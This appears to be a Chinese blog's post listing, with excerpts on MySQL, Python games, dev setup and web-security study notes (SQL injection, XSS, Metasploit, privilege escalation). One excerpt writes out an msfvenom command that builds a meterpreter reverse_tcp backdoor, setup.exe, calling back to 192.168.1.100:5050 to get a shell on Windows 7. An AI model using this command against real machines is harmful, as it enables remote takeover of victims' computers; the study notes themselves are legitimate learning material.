- 博客(33)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 MySQL 5.7中order by在子查询中被优化的解决方法
假设情景:有多个班级。一个班级中有多名学生,现在查询每个班中获得最高分的学生信息。1. 添加limit缺点:受到limit数量的限制select * from ( select student_id, name, score,class_id from student order by score desc limit 100000) rgroup by r.class_id;2. 使用DISTINCT(居然也起到分组作用)我比较菜,select * from ( .
2021-11-15 16:26:52
698
原创 Python3编写炸金花游戏--超详细的讲解!!
自己写一个程序,实现发牌、比大小判断输赢。#### 游戏规则:一付扑克牌,去掉大小王,每个玩家发3张牌,最后比大小,看谁赢。有以下几种牌:豹子:三张一样的牌,如3张6.顺金:又称同花顺,即3张同样花色的顺子, 如红桃 5、6、7顺子:又称拖拉机,花色不同,但是顺子,如红桃5、方片6、黑桃7,组成的顺子对子:2张牌一样单张:单张最大的是A这几种牌的大小顺序为, **豹子>顺金>顺子>对子>单张**#### 需程序实现的点:1. 先生成一付完整
2021-08-19 11:27:13
11646
6
转载 数据库新建表时表名别乱起!
2020/12/20 今天记录一个离谱的错误。。。才知道数据库中表名的创建也不能瞎起。向MySQL数据库中插入数据,sql语句没问题,但插入失败也不报错?
2020-12-20 11:55:31
166
1
原创 1000~9999年内的所有对称日
Python 代码:python求万年内对称日对称日:1001-10-01 1010-01-01 1011-11-01 1020-02-01 1021-12-01 1030-03-01 1040-04-01 1050-05-01 1060-06-01 1070-07-01 1080-08-01 1090-09-01 1101-10-11 1110-01-1...
2020-02-03 15:49:31
1239
1
原创 Python与世界完全对称日--爱与狗粮的竞争
背景:本来是老老实实的看论文,准备搞毕设,突然发现今天是2020.0202,谐音“爱你爱你,你爱你爱”。不得不说,这么有爱的“对称日”还是第一次碰见,上网一搜,果不其然,连民政局都在实力宠新人呢。嗯,今天是个不错的日子,适合结婚,要不要直接跟女朋友表白去拿证?突然,一阵敲门声响起...等等,女朋友?总所周知,程序员这种生物岂会有女朋友???大家退后啊,别滋了 别滋了,诶诶,那个尿毒症的快走,我...
2020-02-02 21:34:48
737
原创 Web安全攻防-----学习笔记(五)之后渗透攻击:权限提升
5.6 后渗透攻击:权限提升通常获取的权限为Guest或User权限,必须将访问权限从Guest提升到User,再到Administrator,最后到System级别。提升权限的方式有两种:纵向提权:低权限角色获得高权限角色的权限 横向提权:获取同级别角色的权限输入shell进入目标机的cmd命令行,利用命令查看我们当前的权限:whoami /groups说明当前是一个标...
2019-09-14 11:14:30
948
原创 Kali利用MSF渗透Win 7获取shell
首先在kali上制作一个后门程序,文件名为:setup.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe#本地监听地址及端口号:192.168.1.100:5050为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...
2019-09-13 23:33:01
3458
原创 Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透
5.5 后渗透攻击:信息收集Metasploit提供了一个非常强大的后渗透工具------Meterpreter,该工具具有多重功能,后期渗透模块有200多个,Meterpreter有以下优势。纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用,适用于Windows、Li...
2019-09-13 21:31:48
2252
1
原创 Web安全攻防-----学习笔记(五)之Metasploit技术
第5章 Metasploit技术apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 apt-get dist-upgrade:升级整个Linux系统。5.2 Metasploit基础5.2.1 专业术语MSF框架由多个模...
2019-09-12 16:08:01
409
原创 Web安全攻防-----学习笔记(四)之XXE漏洞、WAF的那些事
4.12 XXE漏洞4.12.1 介绍XXE漏洞XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文档使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档包括XML声明、DTD文档类型定义、文档元素。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的...
2019-09-12 13:34:27
838
原创 Web安全攻防-----学习笔记(四)之暴力破解、命令执行
4.9 暴力破解“暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我...
2019-09-12 11:35:58
807
原创 Web安全攻防-----学习笔记(四)之文件上传
4.8 文件上传4.8.2 有关知识1.原因上传文件时,如果服务端未代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上传脚本文件(asp、aspx、php、jsp等格式的文件)2.危害非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本文件,又被称为WebShell,也可将WebShell脚本称为一种网页后门。4...
2019-09-11 21:43:42
533
原创 Firefox 尝试与您指定的代理服务器连接时被拒绝
打开自带的IE浏览器(左下角搜索),找到工具----》Internet选项,修改局域网设置。
2019-09-11 18:14:04
9794
3
原创 Web安全攻防-----学习笔记(四)之CSRF与CSRF
4.6 CSRF漏洞CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行也难以防范。4.6.2 利用CSRF漏...
2019-09-10 22:13:36
337
原创 Web安全攻防-----学习笔记(四)之XSS
4.4 XSS基础跨站脚本(Cross-Site Scripting)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。XSS攻击可以分为三种:反射型、存储型、DOM型。4.4.2 XSS漏洞原理1. 反射型XSS反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。2.存储型XSS又称持...
2019-09-10 20:05:38
2680
原创 Web安全攻防-----学习笔记(四)之SQL注入
第四章Web安全原理剖析4.1 SQL注入的基础建议学习(菜鸟教程):https://www.runoob.com/sql/sql-function.html4.1.3 与MySQL注入相关的知识点在MySQL 5.0版本之后,MySQL默认在数据库中存放一个"information_schema"的数据库,在该库中,需记住三个表名,分别是SCHEMATA、TABLES和COLUM...
2019-09-09 22:42:54
624
原创 Web安全攻防-----学习笔记(三)之Nmap
3.3 Nmap详解Network Mapper:网络映射器,它被设计用来快速扫描大型网络,包括主机探测与发现、开放的端口情况、操作系统与应用服务指纹识别、WAF识别及常见安全漏洞。它的图形化界面是Zenmap,分布式框架为DNmap。3.3.2 NMap入门3.3.2.1 扫描参数设置扫描目标:-iL 从文件中导入目标主机或目标网段 -iR 随机选择目标主机 -e...
2019-09-08 16:14:21
678
原创 Web安全攻防-----学习笔记(三)之Burp Suite
3.2 Burp Suite 详解3.2.2 Burp Suite入门 Burp Suite 代理工具是以拦截代理的方式,拦截所有通过代理的网络流量,如客户端的请求数据,服务器端的返回信息等。它主要拦截HTTP和HTTPS协议的流量,通过拦截,Burp Suite以中间人的方式对客户端的请求数据、服务端的返回信息做各种处理,以达到安全测试的目的。以火狐为例,设置代理信息:点...
2019-09-08 13:44:12
690
原创 Web安全攻防-----学习笔记(三)之SQLMap
第3章 常用的渗透测试工具3.1 SQLMap详解SQLMap采用了五种独特的SQL注入技术:基于布尔类型的盲注,可以根据返回页面 判断条件真假 的注入 基于时间的盲注,不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断 基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回到页面中 联合查询注入,在可以使用...
2019-09-07 15:23:58
555
原创 Web安全攻防-----学习笔记(二)
第2章 搭建漏洞环境及实战在线练习平台:https://www.ms08067.com/about/bachang.html2.1在linux系统中安装LANMPLANMP是linux下Apache、Nginx、MySql和PHP的应用环境,本节演示WDLinux的一款集成安装包,首先下载安装包,命令如下:wget http://dl.wdlinux.cn/files/lanmp...
2019-09-07 13:51:09
772
原创 Web安全攻防-----学习笔记(一)
参考书籍:Web安全攻防-渗透测试实战指南 徐焱(yan\)李文轩 等配套资源网址:https://www.ms08067.com/第1章--渗透测试之信息收集1.1whois查询1.2收集敏感信息1.3收集子域名信息1.子域名检测工具,Layer子域名挖掘机、Sublist3r和subDomainsBrute2.收索引擎枚举3.第三方聚合应用枚举4.证书透...
2019-09-07 13:49:41
1858
原创 WEB安全扫盲公开课---学习笔记(二)
第16讲0x01.AWVS简介、简单扫描—HTTP Editor模块介绍AWVS通过网络爬虫来测试网站安全0x02.AWVS的web服务器发现0x03.AWVS爬虫模块的使用0x04.AWVS-FUZZ模块的使用主要用于爆破,目录的扫描0x05.AWVS-Http Sniffer模块的使用0x06.AWVS subdomain scanner的使用详细教程h...
2019-09-06 22:00:13
176
原创 WEB安全扫盲公开课---学习笔记(一)
观看链接https://www.bugbank.cn/live/websm?tdsourcetag=s_pcqq_aiomsg第1讲http常见的请求方法:GET POST PUT COPY DELETE OPTIONShttp状态码web安全五层模型第2讲网络拓扑图第3讲phpstudypython第4 讲OWASP TOP 10http:...
2019-08-07 10:30:36
1129
原创 IDEA2018导包,以及配置Tomcat的图片加载
打开IDEA2018,打开需要导入的项目后展开项目,右键打开pom.xml,如图点击Add as Maven Project后,会自动导包,等待完成即可(此处注意,一定要在网络良好的情况下,并且确定导入成功,不然后面直接报红)再配置好Tomcat,我这里的是Tomcat 7.0,点击右上角Add Configuration...出现下图后,点击“+”号,按以下步骤...
2019-07-05 19:41:42
565
转载 jQuery中$()函数的7种用法汇总
https://blog.csdn.net/qq_28775437/article/details/80321711
2019-07-03 21:39:07
334
原创 实习备忘录之分页技术
补充,格式化代码快捷键:ctrl+alt+Lweb网页之分页技术1.添加插件首先,要在pom文件里面添加依赖:<!-- 分页jar包 --><dependency> <groupId>com.github.pagehelper</groupId> <artifactId>pagehelper<...
2019-07-02 19:24:45
288
原创 实习备忘录-java及java框架的一些必要了解知识
实习作业一.java中常用的注解分三类(JDK注解、Java第三方注解、自定义注解):1.JDK注解 @Override 表示当前方法覆盖了父类的方法 @Deprecation 表示方法已经过时,方法上有横线,使用时会有警告。 @SuppviseWarnings 表示关闭一些警告信息(通知java编译器忽略特定的编译警告)2.Java第三方注解3.自定义注解...
2019-06-29 21:35:56
235
原创 JDBC 实现一个控制台的菜单系统
开发环境及工具:IDEA 2018 + MySQL5.5新建项目如下:第一步:选择Java,点击next默认next,到如下界面,自己命名即可:点击finish,完成新建过程。搭建项目框架如下:注意点:out文件夹不用自己新建,其他按照eclipse里面建包,建类一样。导入mysql的jar包(去官网下或者网盘下载)网盘链接:https://pan...
2019-06-27 18:33:30
859
原创 web环境下的一些开发环境配置
#配置IDEA2018、Tomcat7.0、maven3.6.0、MySql等安装IDEA2018 官网下载地址为:https://www.jetbrains.com/idea/download/#section=windows注意选择对应自己操作系统的版本。IntelliJ IDEA 分为“旗舰版”社区版区,区别如下不区分32位和64位,只有一个安装包。旗舰版功能多有...
2019-06-25 20:54:25
255
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人